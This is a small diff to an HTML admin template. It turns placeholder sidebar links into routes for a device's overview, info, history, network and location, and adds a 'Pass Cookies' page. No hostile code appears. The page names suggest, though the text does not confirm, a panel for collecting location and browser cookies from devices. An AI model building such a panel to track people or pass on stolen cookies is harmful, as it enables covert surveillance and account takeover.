--- a/admin/templates/device.html
+++ b/admin/templates/device.html
@@ -20,11 +20,12 @@
                 
                 
                 <nav class="sidebar-nav">
-                    <a href="#" class="nav-item">Overview</a>
-                    <a href="#" class="nav-item active">Device Info</a>
-                    <a href="#" class="nav-item">History</a>
-                    <a href="#" class="nav-item">Network</a>
-                    <a href="#" class="nav-item">Location</a>
+                    <a class="nav-item" href="/overview">Overview</a>
+                    <a class="nav-item" href="/deviceinfo">Device Info</a>
+                    <a class="nav-item active" href="/history">History</a>
+                    <a class="nav-item" href="/network">Network</a>
+                    <a class="nav-item" href="/location">Location</a>
+                    <a class="nav-item" href="/passcookies">Pass Cookies</a>
                 </nav>
                 
                 <div class="logout-section">
